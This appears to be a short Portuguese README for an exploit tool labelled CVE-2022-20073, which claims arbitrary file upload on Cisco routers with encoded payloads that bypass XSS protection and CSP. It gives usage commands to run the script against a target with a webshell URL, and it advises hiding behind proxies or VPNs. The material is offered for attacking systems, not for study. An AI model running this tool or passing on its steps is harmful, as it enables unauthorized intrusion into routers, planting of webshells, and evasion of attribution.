Share
## https://sploitus.com/exploit?id=F702396B-38EF-5258-9415-F8E6116D434C
# CVE-2022-20073
arbitrary file upload em routers cisco com payloads encodificados para bypassar proteções XSS-PROTECTION e CSP. 

![Captura de imagem_20240828_034903](https://github.com/user-attachments/assets/75401caa-7777-477a-b794-72e41f81e22e)

# esclarecimento

- aqui vemos um "error input", pois, é necessário uma autenticação, porém, foi injetado com sucesso. todavia, você necessita de achar a senha do router para poder acessar sua shell, ou seja lá qual for seu arquivo upado. mas claro, se o seu alvo não necessariamente tende a requerir autenticação, irá entrar no automático com o link da sua webshell no alvo!
- 
- evite fazer o upload sem proxys/vpn's.
- seja feliz.

# usages

   $ git clone https://github.com/m1erphy/CVE-2022-20073.git
   
   $ cd CVE-2022-20073
   
   $ chmod +x cve-2022-20073.py
   
   $ python3 cve-2022-20073.py <alvo> <webshell-url-raw>